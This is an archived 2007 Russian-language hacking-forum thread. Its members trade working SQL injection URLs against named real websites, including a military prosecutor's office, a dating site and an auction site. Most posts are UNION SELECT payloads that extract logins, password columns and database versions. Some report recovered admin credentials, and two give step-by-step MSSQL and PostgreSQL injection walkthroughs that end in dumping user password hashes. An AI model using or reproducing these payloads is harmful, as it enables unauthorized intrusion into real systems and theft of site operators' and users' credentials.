ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.10.2007, 12:51
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
http://www.alturspro.ru/index.php?page=99999'+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16/* не могу подобрать таблицы кто поможет просто для интереса какие там таблицы есть
|
|
|
07.10.2007, 13:06
|
|
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме:
3326855
Репутация:
702
|
|
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,concat_ws(0x3a,login,%20pwd) ,5,6+FROM+cin.Users/*
вот ток где тут админка, я не знаю...
|
|
|
|
07.10.2007, 13:57
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Сообщение от heks
http://www.alturspro.ru/index.php?page=99999'+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16/* не могу подобрать таблицы кто поможет просто для интереса какие там таблицы есть
есть таблица admin,колонки с паролем не нашел.
интересная скуля,вот только колонку с паролями, подобрать не смог
код:
http://date.inter.by/anketa.php?id=-8872'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,name ,14,ID,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,icq+from+users/* может кто подберет,а?
Последний раз редактировалось fobofob; 07.10.2007 в 14:32..
|
|
|
|
07.10.2007, 14:08
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Сообщение от fobofob
есть таблица admin,колонки с паролем не нашел
http://www.alturspro.ru/index.php?page=99999'+UNION+SELECT+1,2,3,4,5,6,7,8 ,AES_DECRYPT(AES_ENCRYPT(pass,%20%200x71),0x71),10 ,11,12,13,14,15,16%20from%20admin/*
2 fobofob
Может ты это нашел? Ну короче это к анкетам
http://date.inter.by/anketa.php?id=-8872'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,pas s,login,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50+from+members/*
Последний раз редактировалось Red_Red1; 07.10.2007 в 16:33..
|
|
|
|
07.10.2007, 19:11
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Гомельская межгарнизонная Военная Прокуратура
код:
http://www.mvp.gomel.by/news.php?id=-87+union+select+1,concat(user(),0x3a,database()),3 ,4,version(),6,7/* 
|
|
|
|
07.10.2007, 20:40
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Код:
http://socketmailsolutions.com/showcase/index.php?action=readmore&id=5-1%20union%20select%200,1,concat(email,char(58),userid,0x3a,adminid),3%20from%20admin/*
Код:
http://sohotemplates.com/index.php?action=readmore&id=-1%20union%20select%200,1,concat(email,0x3a,userid,0x3a,adminid),3%20from%20admin/*
Код:
http://www.covantagetemplates.com/index.php?action=readmore&id=-1%20union%20select%200,1,concat(email,0x3a,userid,0x3a,adminid),3%20from%20admin/*
пароль 123456
Код:
http://www.seksbilgileri.com/kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar
юзер ADMIN
Код:
http://www.seksbilgileri.com/kategori.asp?kat=goster&id=1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
пароль ADMIN
Код:
http://www.demirkandemir.com/kategori.asp?kat=goster&id=-1+union+select+0,1,adkull,3,4,5,6,7+from+ayar
пароль ADMIN
Код:
http://www.demirkandemir.com/kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7+from+ayar
Последний раз редактировалось kair; 07.10.2007 в 20:59..
|
|
|
|
07.10.2007, 21:39
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Инет Аукцион:wink:
код:
http://www.kip.by/auctiondetails.php?id=-100343'+union+select+1,concat_ws(0x3a,version(),us er(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/*
четвертый мускул...
|
|
|
|
07.10.2007, 23:08
|
|
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085
Репутация:
452
|
|
Код:
http://www.o3may.info/news.php?page=viewnews&journal=3&id=-55'+union+select+concat_ws(0x3a,user(),version(),database())/*
|
|
|
|
08.10.2007, 01:21
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
моя первая инъекция в MSSQL
нашёл:
Код:
http://www.asprilexi.com/games_cat.asp?id=1'
проверил:
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=@@version--
схема таблес:
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
выбрал табличку.. лень было искать реальное чтобибудь типа "users" так что выбрал просто не ту что сначала.
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('kartasub','cyfd','dtproperties','erevna','static','sysconstraints','syssegments','var','ahcmd','anikei','apostoli','banner','cardview','choice','comd_list','D99_CMD'))--
колонки:
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='D99_REG'+AND+COLUMN_NAME+NOT+IN+('data'))--
вывод:
Код:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+data+from+D99_REG)--
какойто хз какой язык, поэтому нихрена непонятно.. ну и фик с ним) |
|
|
|
08.10.2007, 15:49
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
моя первая инъекция в PostgreSQL
сам сайт мне дал ещё давно Constantine поэтому даже если боян, прошу не ругать.. просто это был самый короткий путь попробывать свои силы
нашёл:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=1'
столбцы:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+1,null,null,null,null,null--
схема.таблес
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,TABLE_NAME,null,null,null,null+from+information_schema.tables--
хоть еденичка выводится в 1 всёравно table_name мы поставляем в 2.. ибо в 1 другой тип данных.
выбрали табличку: pg_user
выводим колонки:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,COLUMN_NAME,null,null,null,null+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=chr(112)||chr(103)||chr(95)||chr(117)||chr(115)||chr(101)||chr(114)--
перевели в char ибо подругому нерааботет(в данном случае) 
получаем:
Код:
passwd
usecatupd
useconfig
usecreatedb
usename
usesuper
usesysid
valuntil
выводим:
usename:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,usename,null,null,null,null+from+pg_user--
passwd
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,passwd,null,null,null,null+from+pg_user--
объеденим:
Код:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,usename||chr(58)||passwd,null,null,null,null+from+pg_user--
Последний раз редактировалось BlackCats; 08.10.2007 в 16:13..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
